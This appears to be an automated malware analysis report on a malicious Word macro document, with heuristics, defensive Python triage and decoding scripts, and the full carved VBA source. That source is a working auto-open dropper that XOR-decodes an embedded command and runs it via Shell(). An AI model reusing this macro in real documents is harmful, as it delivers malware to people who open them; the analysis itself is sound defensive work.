Verdict: MALICIOUS
Risk Score: 264

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a Microsoft Word document with VBA macros: the module is ThisDocument and the code reads ActiveDocument.FullName. The critical heuristic OLE_VBA_SHELL flags a Shell() call, and OLE_VBA_DOCOPEN together with OLE_VBA_PCODE_AUTOEXEC_EXEC shows that it runs automatically on open through Document_Open. The Workbook_Open handler is an Excel event that Word never fires, and it merely calls Document_Open, so it is a decoy rather than the trigger. The visible macro contains no download code of its own: it reads the document's own bytes from disk, splits them on a long marker string, takes the trailing segment, drops its first two characters, XOR-decodes it with the repeating key "JQHzoFcKLn", passes the result to Shell(), and then blocks on the child process (OpenProcess with SYNCHRONIZE, WaitForSingleObject with INFINITE) until it exits. The decoded command is not shown in this report. ClamAV's Doc.Downloader.Generic-7474871-0 signature suggests that the command is a download-and-execute stager, the usual second-stage delivery technique for this kind of maldoc.
Heuristics (8)

- ClamAV: Doc.Downloader.Generic-7474871-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Generic-7474871-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code.
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA.
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro. This is the real entry point in a Word document.
- Workbook_Open macro [high, OLE_VBA_WBOPEN]: Workbook_Open macro. In this Word sample the handler only calls Document_Open and would never fire in Word; treat it as a decoy, not as a second trigger.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Here source extraction succeeded (see macros.bas below), so this finding corroborates the source-level findings rather than standing in for them.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the XML namespace identifier for DrawingML that appears in ordinary Office documents; it is not a network indicator and should not be treated as C2.
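The heuristics above are token checks over the macro. As an added example that is not the analyzer's code, the following Python reproduces the source-level ones over an excerpt of the macros.bas preview below and adds one check a practitioner wants here: a Workbook_Open handler inside a Word module (ThisDocument / ActiveDocument) can never fire, so it is dead code or a decoy. OLE_VBA_SHELL, OLE_VBA_DOCOPEN and OLE_VBA_WBOPEN reuse the report's identifiers; OLE_VBA_AUTOOPEN, WIN32_DECLARE, CREATEOBJECT, DOWNLOAD_API, the severity ladder and the host-mismatch check are this example's own and not the analyzer's scoring. The compiled p-code check (OLE_VBA_PCODE_AUTOEXEC_EXEC) needs the VBA project streams and is not reproduced.

```python
"""Added example: source-level triage mirroring the OLE_VBA_* heuristics above.

Not the analyzer's code. OLE_VBA_SHELL, OLE_VBA_DOCOPEN and OLE_VBA_WBOPEN reuse the
report's identifiers; the other rule names, the severity ladder and the host-mismatch
check are this example's own. SAMPLE_SOURCE is excerpted from the macros.bas preview.
"""
import re

SUB_HEAD = r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
AUTOEXEC_RULES = {
    "OLE_VBA_DOCOPEN": re.compile(SUB_HEAD + r"Document_Open\b", re.I | re.M),
    "OLE_VBA_WBOPEN": re.compile(SUB_HEAD + r"Workbook_Open\b", re.I | re.M),
    "OLE_VBA_AUTOOPEN": re.compile(SUB_HEAD + r"(?:AutoOpen|Auto_Open|AutoExec)\b", re.I | re.M),
}
EXEC_RULES = {
    "OLE_VBA_SHELL": re.compile(r"\bShell\s*\(", re.I),
    "WIN32_DECLARE": re.compile(
        r'\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\b.*?\bLib\s+"(?:kernel32|urlmon|wininet|shell32)"', re.I),
    "CREATEOBJECT": re.compile(r"\bCreateObject\s*\(", re.I),
    "DOWNLOAD_API": re.compile(r"\b(?:URLDownloadToFile|XMLHTTP|WinHttpRequest|ADODB\.Stream)\b", re.I),
}
# Long unbroken alphanumeric runs: encoded payloads, or (as in this sample) a split marker.
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")

# Excerpt of the carved macros.bas shown later in this report (trimmed to the relevant lines).
SAMPLE_SOURCE = '''Attribute VB_Name = "ThisDocument"
Option Explicit
#If VBA7 Then
Private Declare PtrSafe Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
#End If
Public Sub kAqnPBIjzTPDrCBgyQ()
    Dim fzjHPHAplebeCXOHQeoeI() As Byte
    fzjHPHAplebeCXOHQeoeI = qjyIrqWDdBxQoOy(ActiveDocument.FullName)
    UKcjLZlJEDrhGUgjTL = Split(QFexzTvfVitQPcaTAGolwfxOnF, "CGOxUKUPIdGUIoNOOQKelQUeMaGIAsEwjPaRZjoKnOQCEqYFialbrILMMKKTdmpqzkLSoVOEBZRxZrAvcbAzhDfAdnfpyvGbyAduFfrmlGzrRoMujpQcLQiWekPaQygftPYzogQXKnnAdOIPBKgjEEpIrgquqqwNzuXbqmfdyTrxCISpBayfsXAOAqihQvHtRA")
    fEbjGsOgdcnBcTbdKnv iMGWDIPwxKipkUqAuTYHRDs, 0
End Sub
Sub Workbook_Open()
    Document_Open
End Sub
Private Sub fEbjGsOgdcnBcTbdKnv(ByVal xIkvAPOfmQuLAJyc As String, ByVal w As VbAppWinStyle)
    JTnHBbsvZqFjtVdvTSz = Shell(xIkvAPOfmQuLAJyc, w)
End Sub
Public Sub Document_Open()
    kAqnPBIjzTPDrCBgyQ
End Sub
'''


def triage_vba(source: str) -> dict:
    """Return rule hit counts, the host-mismatch flag, long blobs and a severity."""
    findings = {name: len(rx.findall(source)) for name, rx in {**AUTOEXEC_RULES, **EXEC_RULES}.items()}
    findings = {k: v for k, v in findings.items() if v}
    auto_exec = any(k in AUTOEXEC_RULES for k in findings)
    exec_hit = any(k in EXEC_RULES for k in findings)
    # A Word module (ThisDocument / ActiveDocument) never fires Workbook_Open: an Excel
    # event handler there is dead code or a decoy, which is itself a useful signal.
    is_word = bool(re.search(r'VB_Name = "ThisDocument"|\bActiveDocument\b', source))
    host_mismatch = is_word and "OLE_VBA_WBOPEN" in findings
    blobs = BLOB_RE.findall(source)
    if auto_exec and exec_hit:
        severity = "critical"     # runs on open and executes something: the case above
    elif exec_hit:
        severity = "high"
    elif auto_exec or blobs:
        severity = "medium"
    else:
        severity = "low"
    return {"findings": findings, "auto_exec": auto_exec, "exec": exec_hit,
            "host_mismatch": host_mismatch, "blobs": blobs, "severity": severity}


if __name__ == "__main__":
    result = triage_vba(SAMPLE_SOURCE)
    for key, value in result.items():
        print(f"{key}: {value if key != 'blobs' else [b[:16] + '...' for b in value]}")
```

Run it against any olevba output; the host-mismatch flag is what tells an analyst that the Workbook_Open finding in this report is noise from the attacker's template rather than a second trigger.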
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3997 bytes |

SHA-256: d109bc00d7d1269e719960ef3c71344f11004c8e205a0e1a0ee35952245b43cc

Detection for macros.bas:
- ClamAV: No threats found. The Doc.Downloader.Generic-7474871-0 signature matched the document container, not the decoded VBA source on its own, so the carved source has to be triaged on its content rather than by signature.
- Obfuscation or payload: likely. The carved artifact contains 1 long base64-like blob; the only candidate in the source below is the long alphanumeric string used as the Split() delimiter, which is the marker that locates the encoded command inside the document rather than the encoded command itself.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
Private Declare PtrSafe Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
#Else
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
#End If
Public Sub kAqnPBIjzTPDrCBgyQ()
Dim fzjHPHAplebeCXOHQeoeI() As Byte
fzjHPHAplebeCXOHQeoeI = qjyIrqWDdBxQoOy(ActiveDocument.FullName)
Dim QFexzTvfVitQPcaTAGolwfxOnF As String
QFexzTvfVitQPcaTAGolwfxOnF = StrConv(fzjHPHAplebeCXOHQeoeI, 64)
Dim UKcjLZlJEDrhGUgjTL
UKcjLZlJEDrhGUgjTL = Split(QFexzTvfVitQPcaTAGolwfxOnF, "CGOxUKUPIdGUIoNOOQKelQUeMaGIAsEwjPaRZjoKnOQCEqYFialbrILMMKKTdmpqzkLSoVOEBZRxZrAvcbAzhDfAdnfpyvGbyAduFfrmlGzrRoMujpQcLQiWekPaQygftPYzogQXKnnAdOIPBKgjEEpIrgquqqwNzuXbqmfdyTrxCISpBayfsXAOAqihQvHtRA")
Dim iMGWDIPwxKipkUqAuTYHRDs As String
Dim ujhfhOEmIwAmGuxKoPua As String
Dim blsXDG As String
ujhfhOEmIwAmGuxKoPua = StrConv(StrConv(UKcjLZlJEDrhGUgjTL(UBound(UKcjLZlJEDrhGUgjTL)), 64), 128)
blsXDG = Mid$(ujhfhOEmIwAmGuxKoPua, 3, Len(ujhfhOEmIwAmGuxKoPua))
iMGWDIPwxKipkUqAuTYHRDs = YHTwdherPxHkRbyQOhgVx("JQHzoFcKLn", blsXDG)
fEbjGsOgdcnBcTbdKnv iMGWDIPwxKipkUqAuTYHRDs, 0
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Private Sub fEbjGsOgdcnBcTbdKnv(ByVal xIkvAPOfmQuLAJyc As String, _
ByVal fdcCtmrCbHgWtkuyFfxtFIQ As VbAppWinStyle)
Dim JTnHBbsvZqFjtVdvTSz As Long
Dim HjTFanUD As Long
On Error GoTo zYJbZoLXdFkfKbbAMjIWAaIHoh
JTnHBbsvZqFjtVdvTSz = Shell(xIkvAPOfmQuLAJyc, fdcCtmrCbHgWtkuyFfxtFIQ)
On Error GoTo 0
DoEvents
HjTFanUD = OpenProcess(&H100000, 0, JTnHBbsvZqFjtVdvTSz)
If HjTFanUD <> 0 Then
WaitForSingleObject HjTFanUD, &HFFFFFFFF
CloseHandle HjTFanUD
End If
Exit Sub
zYJbZoLXdFkfKbbAMjIWAaIHoh:
MsgBox "Error starting task " & _
vbCrLf & _
Err.Description, vbOKOnly Or vbExclamation, _
"Error"
End Sub
Public Function YHTwdherPxHkRbyQOhgVx(FOZkEsXOhDiVna As String, eiypfVRhkibDvDQxKlE As String) As String
Dim exTDLt As Long
Dim pebVN As String
Dim nKZHFryNHObDPCkr As Integer, pXCHjw As Integer, a As Long
For exTDLt = 1 To Len(eiypfVRhkibDvDQxKlE)
a = exTDLt Mod Len(FOZkEsXOhDiVna)
If a = 0 Then a = Len(FOZkEsXOhDiVna)
nKZHFryNHObDPCkr = Asc(Mid$(eiypfVRhkibDvDQxKlE, exTDLt, 1))
pXCHjw = Asc(Mid$(FOZkEsXOhDiVna, a, 1))
pebVN = pebVN + Chr(nKZHFryNHObDPCkr Xor pXCHjw)
Next exTDLt
YHTwdherPxHkRbyQOhgVx = pebVN
End Function
Public Sub Document_Open()
kAqnPBIjzTPDrCBgyQ
End Sub
Public Function qjyIrqWDdBxQoOy(ByVal WCOYvnhnptMqUeTEtk As String) As Byte()
Dim ujhfhOEmIwAmGuxKoPua As Long
Dim blsXDG() As Byte
ujhfhOEmIwAmGuxKoPua = FreeFile
Open WCOYvnhnptMqUeTEtk For Binary Access Read As ujhfhOEmIwAmGuxKoPua
ReDim blsXDG(LOF(ujhfhOEmIwAmGuxKoPua) - 1&) As Byte
Get ujhfhOEmIwAmGuxKoPua, , blsXDG
Close ujhfhOEmIwAmGuxKoPua
qjyIrqWDdBxQoOy = blsXDG
End Function
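Recovering the embedded command, as an added example that is not part of this report or of the analyzer: the script below re-implements in Python the decoding path of kAqnPBIjzTPDrCBgyQ and YHTwdherPxHkRbyQOhgVx so that the Shell() argument can be recovered from a copy of the document without running the macro. The document bytes it decodes are constructed here (carrier bytes, the sample's marker, two filler characters, and a placeholder command XOR-encoded with the sample's key); the real file's trailing segment and the resulting command are not reproduced in the report. It assumes the ANSI code page used by StrConv is Latin-1-compatible for the bytes involved, which is exact for an ASCII command line.

```python
"""Added example: recover the sample's Shell() argument from the document bytes.

Mirrors the macro: read the file, split on MARKER, take the trailing segment,
drop its first two characters (Mid$(s, 3, ...)), XOR with the repeating KEY
(YHTwdherPxHkRbyQOhgVx); the result is what fEbjGsOgdcnBcTbdKnv hands to Shell().
"""
import sys

# Both constants are copied from the macro source above.
MARKER = (b"CGOxUKUPIdGUIoNOOQKelQUeMaGIAsEwjPaRZjoKnOQCEqYFialbrILMMKKTdmpqzkLSoVOEBZRxZrAvcbAzhDfAdnfpyv"
          b"GbyAduFfrmlGzrRoMujpQcLQiWekPaQygftPYzogQXKnnAdOIPBKgjEEpIrgquqqwNzuXbqmfdyTrxCISpBayfsXAOAqihQvHtRA")
KEY = b"JQHzoFcKLn"


def xor_repeating(data: bytes, key: bytes) -> bytes:
    # VBA: a = i Mod Len(key); If a = 0 Then a = Len(key)  (1-based indexing).
    # In 0-based terms that is simply key[i % len(key)]: ordinary repeating-key XOR.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_command(document: bytes, marker: bytes = MARKER, key: bytes = KEY) -> str:
    if marker not in document:
        raise ValueError("marker not found: file does not use this sample's layout")
    tail = document.split(marker)[-1]      # UKcj(UBound(UKcj)): the trailing segment
    encrypted = tail[2:]                   # Mid$(s, 3, Len(s)): skip two characters
    # StrConv(bytes, vbUnicode) widens each byte through the ANSI code page; Latin-1
    # is an assumption that is exact for ASCII and close enough for a command line.
    return xor_repeating(encrypted, key).decode("latin-1")


def build_constructed_document(command: str,
                               carrier: bytes = b"\xd0\xcf\x11\xe0 constructed carrier bytes ") -> bytes:
    # Constructed stand-in for the real .doc: carrier, marker, two filler characters,
    # then the XOR-encoded command. Exists only to exercise recover_command().
    return carrier + MARKER + b"\r\n" + xor_repeating(command.encode("latin-1"), KEY)


def main(argv):
    if len(argv) > 1:
        with open(argv[1], "rb") as fh:   # a real document saved to disk
            data = fh.read()
    else:                                 # offline demo on the constructed document
        data = build_constructed_document("cmd /c echo constructed-placeholder")
    print(recover_command(data))


if __name__ == "__main__":
    main(sys.argv)
```

Taking the last Split() segment rather than the second means any earlier copy of the marker in the file, such as the one inside the stored VBA source, is ignored; that is the likely reason the author used UBound. Run the script with the path of a quarantined copy as its argument to obtain the command that ClamAV's Downloader label refers to, and hand that command, not the macro, to the next stage of the investigation.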